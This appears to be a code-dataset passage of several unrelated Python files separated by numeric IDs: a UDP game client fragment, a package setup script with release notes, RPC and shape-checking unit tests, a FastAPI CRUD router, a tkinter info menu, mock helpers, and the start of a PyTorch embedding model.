for seg in data:
seg = seg.split(",,")
full_data += seg
if seg[0] == "Start":
self.username = seg[1]
self.game_port = int(seg[2])
return full_data
except ConnectionResetError:
return [False]
def transport(self, game_data: list) -> tuple:
game_data = [self.username] + game_data
game_data = (dumps(game_data)) + b"||||"
self.udp.sendto(game_data, (self.server, self.game_port))
data, _ = self.udp.recvfrom(100)
data = data.split(b"||||")
if len(data) > 1:
data = loads(data[0])
return True, data
else:
return False, None
|
116180
|
from setuptools import setup
"""
pip install twine
pip install build
CREATING RELEASES-------------------------------------------------------------------------------------------------------
- Update README.md version number
- Update setup.cfg version number
- Update goopylib/__init__.py __version__ variable
- Run setup_extensions.py and build goopylib .pyd C extensions
- Test all Example python files, run goopylib_tests.py and test functions on Windows
- Run goopylib_tests.py countlines() function and update README.md with line count
- Push to GitHub, pull from MacOS computer
- Run setup_extensions.py and build goopylib .so C extensions
- Test all Example python files, run goopylib_tests.py and test functions on MacOS
- Push files to GitHub
- Create GitHub Release
- Update download_url in setup.cfg
- Build goopylib Release
- Upload goopylib Release on TestPyPi
- Install and check from TestPyPi
- Upload goopylib Release on PyPi
- Test goopylib installation on Windows
- Test goopylib installation on MacOS
To create source distribution:
1. python -m build --sdist
2. python setup.py sdist
To create (platform) wheel:
1. python -m build --wheel
2. python setup.py bdist_wheel
To create release (wheel and source distribution):
1. python -m build
2. python setup.py sdist bdist_wheel
To check release: twine check dist/*
To upload test release: twine upload --repository testpypi dist/*
To install test release: pip install -i https://test.pypi.org/simple/ goopylib==version
To upload release: twine upload dist/*
To install release: pip install goopylib==version
Username: BhavyeMathur
"""
setup(package_dir={':maths': 'goopylib/maths', ":objects": 'goopylib/objects', ":applications": 'goopylib/applications',
":sound": 'goopylib/sound', ":physics": 'goopylib/physics'})
|
116182
|
import unittest
import json
from rpc_proxy.request import parse_request, translate_to_app_base
class ProxyTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = 1000
def test_parse_request_01(self):
# should read api and method from "method"
js = '{"jsonrpc":"2.0", "method":"bridge.get_ranked_posts", "params":{"sort":"trending","tag":"","observer":"alice"}, "id":1}'
js_data = json.loads(js)
expected = "rpc_ver: 2.0, api: bridge, method: get_ranked_posts, params: {'sort': 'trending', 'tag': '', 'observer': 'alice'}, id:1"
self.assertEqual(str(parse_request(js_data)), expected)
def test_parse_request_02(self):
# should read api and method from "params"
js = '{"jsonrpc":"2.0", "method":"call", "params": ["condenser_api", "get_follow_count", ["alice"]], "id":1}'
js_data = json.loads(js)
expected = "rpc_ver: 2.0, api: condenser_api, method: get_follow_count, params: ['alice'], id:1"
self.assertEqual(str(parse_request(js_data)), expected)
def test_parse_request_03(self):
# should create empty "params" field if not provided
js = '{"jsonrpc":"2.0", "method":"database_api.get_dynamic_global_properties", "id":1}'
js_data = json.loads(js)
expected = "rpc_ver: 2.0, api: database_api, method: get_dynamic_global_properties, params: [], id:1"
self.assertEqual(str(parse_request(js_data)), expected)
def test_translate_app_base(self):
"""
## With empty dict params
"""
js = '{"id": 85, "jsonrpc": "2.0", "method": "database_api.get_version", "params": {}}'
js_data = json.loads(js)
req = parse_request(js_data)
expected = "{'id': 85, 'jsonrpc': '2.0', 'method': 'call', 'params': ['condenser_api', 'get_version', []]}"
self.assertEqual(str(translate_to_app_base(req).data), expected)
"""
## No params provided
"""
js = '{"id": 85, "jsonrpc": "2.0", "method": "database_api.get_version"}'
js_data = json.loads(js)
req = parse_request(js_data)
expected = "{'id': 85, 'jsonrpc': '2.0', 'method': 'call', 'params': ['condenser_api', 'get_version', []]}"
self.assertEqual(str(translate_to_app_base(req).data), expected)
"""
## Params provided with list
"""
js = '{"id": 85, "jsonrpc": "2.0", "method": "condenser_api.get_following", "params":["hiveio",null,"blog",10]}'
js_data = json.loads(js)
req = parse_request(js_data)
expected = "{'id': 85, 'jsonrpc': '2.0', 'method': 'call', 'params': ['condenser_api', 'get_following', ['hiveio', None, 'blog', 10]]}"
self.assertEqual(str(translate_to_app_base(req).data), expected)
"""
## Params provided with dict
"""
js = '{"id": 85, "jsonrpc": "2.0", "method": "condenser_api.get_following", "params": {"foo":"bar"}}'
js_data = json.loads(js)
req = parse_request(js_data)
expected = "{'id': 85, 'jsonrpc': '2.0', 'method': 'call', 'params': ['condenser_api', 'get_following', ['bar']]}"
self.assertEqual(str(translate_to_app_base(req).data), expected)
|
116229
|
from typing import List
import asyncpg
from fastapi import APIRouter, HTTPException, Response
import utils
from api.dependencies import has_permissions
from api.models import ChallengeLanguage
from api.models.permissions import ManageWeeklyChallengeLanguages
from .helpers import check_piston_language_version
from .models import (
ChallengeLanguageResponse,
NewChallengeLanguageBody,
UpdateChallengeLanguageBody,
)
router = APIRouter(prefix="/languages")
@router.get(
"",
tags=["challenge languages"],
response_model=List[ChallengeLanguageResponse],
)
async def fetch_all_languages():
"""Fetch all the weekly challenge languages, ordered alphabetically."""
query = """
SELECT *,
l.id::TEXT
FROM challengelanguages l
ORDER BY name
"""
records = await ChallengeLanguage.pool.fetch(query)
return [dict(record) for record in records]
@router.get(
"/{id}",
tags=["challenge languages"],
response_model=ChallengeLanguageResponse,
responses={
404: {"description": "Language not found"},
},
)
async def fetch_language(id: int):
"""Fetch a weekly challenge language by its id."""
query = """
SELECT *,
l.id::TEXT
FROM challengelanguages l
WHERE l.id = $1
"""
record = await ChallengeLanguage.pool.fetchrow(query, id)
if not record:
raise HTTPException(404, "Language not found")
return dict(record)
@router.post(
"",
tags=["challenge languages"],
response_model=ChallengeLanguageResponse,
responses={
201: {"description": "Language Created Successfully"},
401: {"description": "Unauthorized"},
403: {"description": "Missing Permissions"},
404: {"description": "Piston language or version not found"},
409: {"description": "Language with that name already exists"},
},
status_code=201,
response_class=utils.JSONResponse,
dependencies=[has_permissions([ManageWeeklyChallengeLanguages()])],
)
async def create_language(body: NewChallengeLanguageBody):
"""Create a weekly challenge language."""
await check_piston_language_version(body.piston_lang, body.piston_lang_ver)
query = """
INSERT INTO challengelanguages (id, name, download_url, disabled, piston_lang, piston_lang_ver)
VALUES (create_snowflake(), $1, $2, $3, $4, $5)
RETURNING *;
"""
try:
record = await ChallengeLanguage.pool.fetchrow(
query,
body.name,
body.download_url,
body.disabled,
body.piston_lang,
body.piston_lang_ver,
)
except asyncpg.exceptions.UniqueViolationError:
raise HTTPException(409, "Language with that name already exists")
return dict(record)
@router.patch(
"/{id}",
tags=["challenge languages"],
responses={
204: {"description": "Language Updated Successfully"},
401: {"description": "Unauthorized"},
403: {"description": "Missing Permissions"},
404: {"description": "Piston language or version not found"},
409: {"description": "Language with that name already exists"},
},
status_code=204,
dependencies=[has_permissions([ManageWeeklyChallengeLanguages()])],
)
async def update_language(id: int, body: UpdateChallengeLanguageBody):
"""Update a weekly challenge language."""
query = "SELECT * FROM challengelanguages WHERE id = $1"
record = await ChallengeLanguage.pool.fetchrow(query, id)
if not record:
raise HTTPException(404, "Language not found")
language = ChallengeLanguage(**record)
data = body.dict(exclude_unset=True)
if "piston_lang" in data or "piston_lang_ver" in data:
await check_piston_language_version(
data.get("piston_lang", language.piston_lang),
data.get("piston_lang_ver", language.piston_lang_ver),
)
if data:
query = "UPDATE challengelanguages SET "
query += ", ".join(f"{key} = ${i}" for i, key in enumerate(data, 2))
query += " WHERE id = $1"
try:
await ChallengeLanguage.pool.execute(query, id, *data.values())
except asyncpg.exceptions.UniqueViolationError:
raise HTTPException(409, "Language with that name already exists")
return Response(status_code=204, content="")
@router.delete(
"/{id}",
tags=["challenge languages"],
responses={
204: {"description": "Language Deleted Successfully"},
401: {"description": "Unauthorized"},
403: {"description": "Missing Permissions or language used in a challenge"},
404: {"description": "Language not found"},
},
status_code=204,
dependencies=[has_permissions([ManageWeeklyChallengeLanguages()])],
)
async def delete_language(id: int):
"""Delete a weekly challenge language, if it hasn't been used in any challenges."""
query = "SELECT * FROM challengelanguages WHERE id = $1"
record = await ChallengeLanguage.pool.fetchrow(query, id)
if not record:
raise HTTPException(404, "Language not found")
# language = ChallengeLanguage(**record)
query = """
SELECT * FROM challenges WHERE $1 = ANY(language_ids)
"""
records = await ChallengeLanguage.pool.fetch(query, id)
if records:
raise HTTPException(403, "Language used in a challenge")
await ChallengeLanguage.pool.execute(
"DELETE FROM challengelanguages WHERE id = $1", id
)
return Response(status_code=204, content="")
|
116245
|
import time, random
from core.Profiler import *
from colorama import Fore
from core import settings
from datetime import date
from txt.text import text
from txt.header import lb_header
from tkinter import *
def checkVersion():
version = sys.version[:1]
if int(version) == 3:
pass
else:
sys.exit(warning+" Please run python version 3.")
def clear():
if os.name == 'nt':
return os.system('cls')
else:
return os.system('clear')
def times():
times = time.strftime("%H:%M:%S")
times = str(times)
return(times)
def menu(self,screen):
global labl
pr = Profiler()
pr.loadDatabase(settings.pathDatabase)
sizeOfDB = pr.size
nbProfilesBDD = pr.count
# print(lb_header())
# print(menu% (Fore.YELLOW + str(date.today()) + Fore.RESET, # for date
# Fore.YELLOW + times() + Fore.RESET, # for time
# Fore.YELLOW + str(settings.timezone) + Fore.RESET, # timezone
# Fore.YELLOW + str(settings.version) + Fore.RESET, # version
# Fore.CYAN + settings.country + Fore.RESET, # Country
# settings.countrycode, # countrycode
# Fore.CYAN + str(settings.Region) + Fore.RESET, Fore.YELLOW + str(settings.Regionname) + Fore.RESET, # Region
# Fore.YELLOW + str(settings.zip) + Fore.RESET, # Pincode
# settings.isp, Fore.GREEN + settings.org + Fore.RESET,
# Fore.YELLOW + str(settings.query) + Fore.RESET,
# Fore.GREEN + str(nbProfilesBDD) + Fore.RESET, Fore.RED + str(sizeOfDB) + Fore.RESET, #database
# random.choice(text)# txt
# ))
if screen == True:
menu = """
Time: [ {0} | {1} ]\n
Time Zone: [ {2} ]\n
Author: [ ANKESH054 ]\n
Version: [ {3} ]\n
Country: [ {4} | {5} ]\n
Region: [ {6} | {7} ]\n
Pin Code: [ {8} ]\n
ISP: [ {9} ]\n
Gateways: [ {10} ]\n
Public Ip: [ {11} ]\n
Database: [ {12} | {13} Ko ]\n
{14}
"""
else:
menu = """
Time: [ {0} | {1} ]\n
Time Zone: [ {2} ]\n
Country: [ {4} | {5} ]\n
Region: [ {6} | {7} ]\n
Pin Code: [ {8} ]\n
ISP: [ {9} ]\n
Gateways: [ {10} ]\n
Public Ip: [ {11} ]\n
Database: [ {12} | {13} Ko ]\n\n
{14}
"""
labl = Label(self, text=menu.format(str(date.today()), # for date
times(), # for time
str(settings.timezone), # timezone
str(settings.version), # version
settings.country, # Country
settings.countrycode, # countrycode
str(settings.Region), str(settings.Regionname), # Region
str(settings.zip), # Pincode
settings.isp, settings.org,
str(settings.query),
str(nbProfilesBDD), str(sizeOfDB), # database
random.choice(text) # txt
), bg="black", fg="green",
font=("comicsansms", 15, "bold"), relief=FLAT)
labl.place(x=20, y=2)
# return
|
116247
|
from spylunking.log.setup_logging import test_logger
from antinex_utils.consts import SUCCESS
from antinex_utils.consts import ERR
from antinex_utils.consts import FAILED
from tests.mock_model import MockModel
log = test_logger(name='mock-predictions')
def build_response_data(
req):
"""build_response_data
:param req: request dict
"""
model = MockModel(
req=req)
predictions = req.get(
"test_predictions",
[])
sample_predictions = req.get(
"test_predictions",
[])
rounded = req.get(
"test_predictions",
[])
accuracy = req.get(
"test_accuracy",
{
"accuracy": 52.5
})
error = req.get(
"test_error",
None)
image_file = req.get(
"image_file",
None)
history = req.get(
"history",
None)
histories = req.get(
"histories",
None)
indexes = req.get(
"test_indexes",
None)
scores = req.get(
"test_scores",
None)
cm = req.get(
"test_cm",
None)
predicts_merged = req.get(
"test_predicts_merged",
False)
merge_df = req.get(
"test_merge_df",
None)
data = {
"predictions": predictions,
"rounded_predictions": rounded,
"sample_predictions": sample_predictions,
"acc": accuracy,
"scores": scores,
"history": history,
"histories": histories,
"image_file": image_file,
"model": model,
"indexes": indexes,
"confusion_matrix": cm,
"are_predicts_merged": predicts_merged,
"merge_df": merge_df,
"err": error
}
return data
# end of build_response_data
def mock_make_predictions_success(
req):
"""mock_make_predictions_success
:param req: request dict
"""
res = {
"status": SUCCESS,
"err": "mock success test",
"data": build_response_data(req)
}
log.info("returning SUCCESS")
return res
# end of mock_make_predictions_success
def mock_make_predictions_error(
req):
"""mock_make_predictions_error
:param req: request dict
"""
res = {
"status": ERR,
"err": "mock error test",
"data": build_response_data(req)
}
log.info("returning ERROR")
return res
# end of mock_make_predictions_error
def mock_make_predictions_fail(
req):
"""mock_make_predictions_fail
:param req: request dict
"""
res = {
"status": FAILED,
"err": "mock fail test",
"data": build_response_data(req)
}
log.info("returning FAILED")
return res
# end of mock_make_predictions_fail
|
116251
|
import numpy as np
import pytest
from shapecheck import (ShapeError, check_shapes, is_checking_enabled, is_compatible,
set_checking_enabled, str_to_shape)
from .utils import CaptureStdOut
def test_basic():
@check_shapes('3', '4', out_='2')
def f(x, y):
return x[:2]**2 + y[:2]**2
f(np.array([1, 2, 3]), np.array([1, 2, 3, 4]))
with pytest.raises(ShapeError):
f(np.array([1, 2, 3]), np.array([2, 3, 4]))
def test_named_dim():
@check_shapes('3,N', 'N', out_='1,N')
def f(x, y):
return (x + y).sum(0, keepdims=True)
f(np.ones((3, 5)), np.ones((5,)))
with pytest.raises(ShapeError):
f(np.ones((3, 4)), np.ones((5,)))
def test_named_dim_one_arg():
@check_shapes('A,A,N', out_='N')
def f(x):
return x.sum((0, 1))
f(np.ones((5, 5, 7)))
with pytest.raises(ShapeError):
f(np.ones((6, 5, 7)))
def test_any_dim():
@check_shapes('N,-1', out_='N,1')
def f(x):
return x.sum(-1, keepdims=True)
f(np.ones((5, 3)))
f(np.ones((5, 7)))
def test_ndim_mismatch():
@check_shapes('-1,-1')
def f(x):
return x
f(np.ones((1, 2)))
with pytest.raises(ShapeError):
f(np.ones((1,)))
with pytest.raises(ShapeError):
f(np.ones((1, 2, 3)))
def test_no_stdout():
# Prevent pushing debug messages.
with CaptureStdOut() as output:
@check_shapes('3,A,A,N', out_='N')
def f(x):
return x.sum((0, 2, 1))
f(np.ones((3, 5, 5, 7)))
with pytest.raises(ShapeError):
f(np.ones((3, 6, 5, 7)))
assert len(output) == 0
def test_readme_example():
import numpy as np
from shapecheck import check_shapes
@check_shapes('-1,N', 'N', None, '3,N', out_='3,N')
def f(a, b, c, d):
return (a + b).sum(0, keepdims=True) + d
f(np.ones((7, 5)), np.ones(5), 'anything', np.ones((3, 5))) # succeeds
f(np.ones((2, 6)), np.ones(6), np.ones(1), np.ones((3, 6))) # succeeds
with pytest.raises(ShapeError):
f(np.ones((2, 6)), np.ones(5), np.ones(1), np.ones((3, 6))) # fails
@check_shapes('1,...,1', '...,1,1')
def g(a, b):
pass
g(np.ones((1, 3, 4, 1)), np.ones((2, 1, 1))) # succeeds
g(np.ones((1, 1)), np.ones((1, 1))) # succeeds
with pytest.raises(ShapeError):
g(np.ones((2, 3, 4, 1)), np.ones((1, 1))) # fails
@check_shapes('batch,variadic...', 'variadic...')
def h(a, b):
pass
h(np.ones((7, 1, 2)), np.ones((1, 2))) # succeeds
with pytest.raises(ShapeError):
h(np.ones((6, 2)), np.ones((1, 1))) # fails
with pytest.raises(ShapeError):
h(np.ones((6, 2)), np.ones((1))) # fails
def test_non_array_args():
@check_shapes(None, '2,N', None)
def f(x, y, z):
return 1
f('some string', np.ones((2, 5)), np.ones((5,)))
f(np.ones((1, 2, 3)), np.ones((2, 6)), 'non-array object')
with pytest.raises(ShapeError):
f(np.ones((1, 1)), np.ones((3, 5)), np.ones((5,)))
with pytest.raises(ShapeError):
f('another-test', np.ones((3, 6)), 'non-array object')
@pytest.mark.parametrize('string, shape', [('N,1,3,M', ('N', 1, 3, 'M')),
('N, 1, 3, M', ('N', 1, 3, 'M')),
('...,a,1', ('...', 'a', 1)),
('1, ... ,2', (1, '...', 2)),
('a,b,c,...', ('a', 'b', 'c', '...')),
('...', ('...',))])
def test_shape_to_str(string, shape):
result = str_to_shape(string)
for a, b in zip(shape, result):
assert a == b, f'Expected: {shape} Got: {result}'
@pytest.mark.parametrize('string', [
'...,...,...', 'a,...,b,...', '...,1,...', (1, 2), 3, 4.0, [5.0], ['1,2'], ('1,2',)
])
def test_shape_to_str_error(string):
with pytest.raises(RuntimeError):
str_to_shape(string)
@pytest.mark.parametrize('shape, expected_shape', [
((3, 2, 3), ('n', 2, 'n')),
((3, 2, 3), ('n', '...', 2, 'n')),
((3, 1, 1, 2, 3), ('n', '...', 2, 'n')),
((3, 2, 3), ('...', 'n', 2, 'n')),
((1, 1, 3, 2, 3), ('...', 'n', 2, 'n')),
((3, 2, 3), ('n', 2, 'n', '...')),
((3, 2, 3, 1, 1), ('n', 2, 'n', '...')),
((3, 2, 3), ('...',)),
])
def test_compatible_variadic_shapes(shape, expected_shape):
assert is_compatible(shape, expected_shape)
@pytest.mark.parametrize('shape, expected_shape', [
((3, 3, 3), ('n', 2, 'n')),
((3, 2, 4), ('n', '...', 2, 'n')),
((3, 1, 1, 3, 3), ('n', '...', 2, 'n')),
((4, 2, 3), ('...', 'n', 2, 'n')),
((1, 1, 2, 3), ('...', 'n', 2, 'n')),
((3, 3), ('n', 2, 'n', '...')),
((2, 3, 1, 1), ('n', 2, 'n', '...')),
])
def test_incompatible_variadic_shapes(shape, expected_shape):
assert not is_compatible(shape, expected_shape)
@pytest.mark.parametrize('e_shape1, e_shape2, shape1, shape2', [
(('n...,1,1', 'n...', (1, 2, 3, 1, 1), (1, 2, 3))),
(('...,1,1', 'n...', (1, 2, 3, 1, 1), (1, 2, 3))),
(('n...,2,2', '1,n...', (2, 2), (1,))),
(('n...,1,1', 'a...', (1, 2, 3, 1, 1), (1, 3))),
(('1,2,a...,3,4', '6,a...,7', (1, 2, 9, 9, 3, 4), (6, 9, 9, 7))),
(('1,2,a...,3,4', '6,a...,7', (1, 2, 9, 3, 4), (6, 9, 7))),
(('1,2,a...,3,4', '6,a...,7', (1, 2, 3, 4), (6, 7))),
])
def test_named_variadic_shapes(e_shape1, e_shape2, shape1, shape2):
@check_shapes(e_shape1, e_shape2)
def f(a, b):
pass
f(np.ones(shape1), np.ones(shape2))
@pytest.mark.parametrize('e_shape1, e_shape2, shape1, shape2', [
(('n...,1,1', 'n...', (1, 2, 3, 1, 1), (1, 3, 3))),
(('n...,1,1', 'n...', (1, 2, 3, 1, 1), (1, 3))),
(('n...,2,2', '1,n...', (2, 2), (1, 1))),
(('n...,2,2', 'n...', (2, 2), (1,))),
(('n...,', 'n...', (2, 2), (1,))),
(('1,2,a...,3,4', '6,a...,7', (1, 2, 8, 9, 3, 4), (6, 9, 9, 7))),
(('1,2,a...,3,4', '6,a...,7', (1, 2, 7, 3, 4), (6, 9, 7))),
(('1,2,a...,3,4', '6,a...,7', (1, 2, 3, 4), (6, 1, 7))),
])
def test_bad_named_variadic_shapes(e_shape1, e_shape2, shape1, shape2):
@check_shapes(e_shape1, e_shape2)
def f(a, b):
pass
with pytest.raises(ShapeError):
f(np.ones(shape1), np.ones(shape2))
def test_incompatible_output():
@check_shapes(out_='1,1')
def f():
return np.ones((1,))
with pytest.raises(ShapeError):
f()
def test_nested_structs():
@check_shapes(('N,1', 'N'), '1,2', out_={'one': ('N,1', 'N'), 'two': ('1,2')})
def f(one, two):
return {'one': one, 'two': two}
f((np.ones((7, 1)), np.ones((7,))), np.ones((1, 2)))
with pytest.raises(ShapeError):
f((np.ones((7, 1)), np.ones((6,))), np.ones((1, 2)))
def test_readme_nested_example():
@check_shapes(('N,1', 'N'), '1,2', out_={'one': ('N,1', 'N'), 'two': ('1,2')})
def f(one, two):
return {'one': (one[1], one[1]), 'two': two.sum()}
with pytest.raises(ShapeError):
f((np.ones((7, 1)), np.ones((7,))), np.ones((1, 2)))
def test_readme_set_checking_enabled():
from shapecheck import is_checking_enabled, set_checking_enabled
assert is_checking_enabled()
set_checking_enabled(False)
assert not is_checking_enabled()
set_checking_enabled(True)
assert is_checking_enabled()
with set_checking_enabled(False):
assert not is_checking_enabled()
assert is_checking_enabled()
def test_set_checking_enabled():
@check_shapes('3', '4', out_='2')
def f(x, y):
return x[:2]**2 + y[:2]**2
set_checking_enabled(False)
assert not is_checking_enabled()
f(np.array([1, 2, 3]), np.array([1, 2, 3, 4]))
f(np.array([1, 2, 3]), np.array([2, 3, 4]))
@check_shapes('3', '4', out_='2')
def g(x, y):
return x[:2]**2 + y[:2]**2
set_checking_enabled(True)
assert is_checking_enabled()
with pytest.raises(ShapeError):
f(np.array([1, 2, 3]), np.array([2, 3, 4]))
with pytest.raises(ShapeError):
g(np.array([1, 2, 3]), np.array([2, 3, 4]))
def test_set_checking_enabled_context():
@check_shapes('3', '4', out_='2')
def f(x, y):
return x[:2]**2 + y[:2]**2
assert is_checking_enabled()
with set_checking_enabled(False):
assert not is_checking_enabled()
f(np.array([1, 2, 3]), np.array([1, 2, 3, 4]))
f(np.array([1, 2, 3]), np.array([2, 3, 4]))
@check_shapes('3', '4', out_='2')
def g(x, y):
return x[:2]**2 + y[:2]**2
assert is_checking_enabled()
with pytest.raises(ShapeError):
f(np.array([1, 2, 3]), np.array([2, 3, 4]))
with pytest.raises(ShapeError):
g(np.array([1, 2, 3]), np.array([2, 3, 4]))
def test_match_callees():
@check_shapes('N', 'M', 'O', out_='N')
def f(x, y, z):
return x
@check_shapes('N', 'M', 'R', match_callees_=True)
def g(x, y, z):
return f(x, y, z)
g(np.ones(5), np.ones(6), np.ones(7))
def test_match_callees_error():
@check_shapes('N', 'M', 'O', out_='N')
def f(x, y, z):
return x
@check_shapes('M', 'N', 'R', match_callees_=True)
def g(x, y, z):
return f(x, y, z)
with pytest.raises(ShapeError):
g(np.ones(5), np.ones(6), np.ones(7))
def test_match_callees_complex():
@check_shapes('a, v...', 'v...', out_='v...')
def f(x, y):
return x.sum(0) + y
@check_shapes('v...')
def g(x):
return x.sum()
@check_shapes('a', match_callees_=True)
def h(x):
a = np.ones((x.shape[0], 2, 3, 4))
b = np.ones((2, 3, 4))
f(a, b)
return g(np.ones((5, 4, 3)))
h(np.ones((8)))
@check_shapes('a', match_callees_=True)
def h(x):
a = np.ones((x.shape[0] - 1, 2, 3, 4))
b = np.ones((2, 3, 4))
f(a, b)
return g(np.ones((5, 4, 3)))
with pytest.raises(ShapeError):
h(np.ones((8)))
def test_match_callees_readme():
@check_shapes('M', 'N', 'O', out_='M')
def child_fn(a, b, c):
return a
@check_shapes('M', 'N', 'R')
def parent_fn_1(x, y, z):
return child_fn(y, x, z)
@check_shapes('M', 'N', 'R', match_callees_=True)
def parent_fn_2(x, y, z):
return child_fn(y, x, z)
parent_fn_1(np.ones(5), np.ones(6), np.ones(7)) # succeeds
with pytest.raises(ShapeError):
parent_fn_2(np.ones(5), np.ones(6), np.ones(7)) # fails
@pytest.mark.parametrize('cs_args, cs_kwargs, f_args, f_kwargs', [
(('N', 'M', 'O', 'P'), {}, (1, 2, 3), {}),
(('N', 'M', 'O', 'P'), {}, (1, 2), {'c': 3}),
(('N', 'M', 'O',), {}, (1, 2, 3), {}),
(('N', 'M'), {}, (1, 2), {'c': 3}),
(('N', 'M', 'O', 'P'), {}, (1,), {'c': 3, 'b': 2}),
(('N', 'M', 'O'), {'d': 'P'}, (1, 2, 3), {}),
(('N', 'M'), {'c': 'O', 'd': 'P'}, (1, 2, 3), {}),
(('N',), {'b': 'M', 'c': 'O', 'd': 'P'}, (1, 2), {'c': 3}),
((), {'a': 'N', 'b': 'M', 'c': 'O', 'd': 'P'}, (1, 2, 3), {}),
((), {'a': 'N', 'b': 'M', 'c': 'O', 'd': 'P'}, (1, 2), {'c': 3}),
]) # yapf: disable
def test_check_shapes_signature(cs_args, cs_kwargs, f_args, f_kwargs):
# TODO: write more rigorous shape signature tests
@check_shapes(*cs_args, **cs_kwargs)
def f(a, b, c, *, d):
pass
f_kwargs = {k: np.ones(v) for k, v in f_kwargs.items()}
f(*map(np.ones, f_args), d=np.ones(4), **f_kwargs)
def test_readme_example2():
# yapf: disable
@check_shapes({'imgs': 'N,W,W,-1', 'labels': 'N,1'}, 'N', None, out_='')
def loss_fn(batch, arg2, arg3):
diff = (batch['imgs'].mean((1, 2, 3)) - batch['labels'].squeeze())
return np.mean(diff**2 + arg2)
loss_fn({'imgs': np.ones((3, 2, 2, 1)), 'labels': np.ones((3, 1))},
arg2=np.ones(3), arg3=np.ones((2, 3))) # succeeds
loss_fn({'imgs': np.ones((5, 3, 3, 4)), 'labels': np.ones((5, 1))},
arg2=np.ones(5), arg3='any') # succeeds
with pytest.raises(ShapeError):
loss_fn({'imgs': np.ones((3, 5, 2, 1)), 'labels': np.ones((3, 1))},
arg2=np.ones(3), arg3='any') # fails
# yapf: enable
def test_readme_example3():
@check_shapes({'imgs': 'N,W,W,-1', 'labels': 'N,1'}, aux_info=None, out_='')
def loss(batch, aux_info):
# do something with aux_info
diff = (batch['imgs'].mean((1, 2, 3)) - batch['labels'].squeeze())
return np.mean(diff**2)
loss({'imgs': np.ones((3, 2, 2, 1)), 'labels': np.ones((3, 1))}, np.ones(1))
loss({'imgs': np.ones((5, 3, 3, 4)), 'labels': np.ones((5, 1))}, 'any')
with pytest.raises(ShapeError):
loss({'imgs': np.ones((3, 5, 2, 1)), 'labels': np.ones((3, 1))}, 'any')
@pytest.mark.parametrize('inp, out', [(1, 1), (np.array(2), 2), (3, np.array(4)),
(np.array(5), np.array(6))])
def test_scalar_output(inp, out):
@check_shapes(x='', out_='')
def loss_fn(x):
return out
loss_fn(inp)
|
116292
|
import argparse
def dataset(
some_positional_arg,
folder : str = 'default',
):
"""Creates a dataset.
Parameters
----------
some_positional_arg
Some positional argument that gets passed in via the script.
folder : str, optional
Folder for the dataset, by default 'default'
"""
print(folder)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--train_folder', type=str, default='default')
parser.add_argument('--val_folder', type=str, default='default')
parser.add_argument('--test_folder', type=str, default='default')
some_positional_arg = None
args = vars(parser.parse_args())
dataset(some_positional_arg)
dataset(some_positional_arg, args['train_folder'])
dataset(some_positional_arg, args['val_folder'])
dataset(some_positional_arg, args['test_folder'])
|
116324
|
from typing import Dict, List
import pytest
from boardfarm.devices.base_devices.acs_template import AcsTemplate
def test_cannot_instantiate_abc_acs():
with pytest.raises(TypeError) as err:
acs = AcsTemplate() # noqa: F841
print(str(err.value))
assert "Can't instantiate abstract class AcsTemplate" in str(err.value)
def test_cannot_instantiate_derived_acs_missing_model():
with pytest.raises(TypeError) as err:
# missing "model" property definition
class MyAcs(AcsTemplate):
def __init__(self, *args, **kwargs) -> None:
pass
def connect(self, *args, **kwargs) -> None:
pass
def GPV(self, cpe_id: str, parameter: str) -> None:
pass
def SPV(self, cpe_id: str, key_value: List[Dict[str, str]]) -> int:
pass
acs = MyAcs() # noqa: F841
assert "Can't instantiate abstract class MyAcs" in str(err.value)
def test_cannot_instantiate_derived_acs_incorrect_signature():
with pytest.raises(TypeError) as err:
# missing "model" property definition
class MyAcs(AcsTemplate):
model = "unittest"
def __init__(self, *args, **kwargs) -> None:
pass
def connect(self, *args, **kwargs) -> None:
pass
# cpe_id: str param should be present
def GPV(self, parameter: str):
pass
def SPV(self, cpe_id: str, key_value: List[Dict[str, str]]) -> int:
pass
acs = MyAcs() # noqa: F841
assert (
"Abstract method 'GPV' not implemented with correct signature in 'MyAcs'"
in str(err.value)
)
def test_can_instantiate_derived_acs_with_correct_structure():
class MyAcs(AcsTemplate):
model = "unittest"
def __init__(self, *args, **kwargs) -> None:
pass
def connect(self, *args, **kwargs) -> None:
pass
def GPV(self, cpe_id: str, parameter: str) -> None:
pass
def SPV(self, cpe_id: str, key_value: List[Dict[str, str]]) -> int:
pass
acs = MyAcs() # noqa: F841
|
116337
|
import torch
from torch.autograd import Variable
from typing import Dict
from torch.nn import Module, Linear, Dropout, Sequential, Embedding, LogSigmoid, ReLU
from torch.nn.functional import sigmoid, logsigmoid, softmax, normalize, log_softmax
from embeddings.representation import SpanRepresentation
from torch.nn.init import xavier_normal
from embeddings.util import pretrained_embeddings_or_xavier
import numpy as np
from torch.nn.functional import cosine_similarity
def get_type_file(filename, vocab, indxs=False):
data = np.load(filename)
if len(vocab) - data.shape[0] > 0:
if indxs:
data = data + (len(vocab) - data.shape[0])
data = np.concatenate((np.ones((len(vocab) - data.shape[0], data.shape[1]), dtype=data.dtype), data))
return torch.from_numpy(data)
class Pair2Vec(Module):
def __init__(self, config, arg_vocab, rel_vocab):
super(Pair2Vec, self).__init__()
self.config = config
self.arg_vocab = arg_vocab
self.rel_vocab = rel_vocab
self.compositional_rels = config.compositional_rels
self.normalize_pretrained = getattr(config, 'normalize_pretrained', False)
self.separate_mlr = getattr(config, 'separate_mlr', False)
self.positional_rels = getattr(config, 'positional_rels', False)
self.type_scores = get_type_file(config.type_scores_file, arg_vocab).cuda() if hasattr(config, 'type_scores_file') else None
self.type_indices = get_type_file(config.type_indices_file, arg_vocab, indxs=True).cuda() if hasattr(config, 'type_indices_file') else None
self.pad = arg_vocab.stoi['<pad>']
score_fn_str = getattr(config, 'score_function', 'dot_product')
if score_fn_str == 'dot_product':
self.score = (lambda predicted, observed : (predicted * observed).sum(-1))
elif score_fn_str == 'cosine':
self.score = (lambda predicted, observed : cosine_similarity(predicted, observed, dim=1, eps=1e-8))
else:
raise NotImplementedError()
self.num_neg_samples = getattr(config, 'num_neg_samples', 1)
self.num_sampled_relations = getattr(config, 'num_sampled_relations', 1)
self.subword_vocab_file = getattr(config, 'subword_vocab_file', None)
self.loss_weights = [('positive_loss', getattr(config, 'positive_loss', 1.0)),
('negative_rel_loss', getattr(config, 'negative_rel_loss', 1.0)),
('negative_subject_loss', getattr(config, 'negative_subject_loss', 1.0)),
('negative_object_loss', getattr(config, 'negative_object_loss', 1.0))]
if self.type_scores is not None:
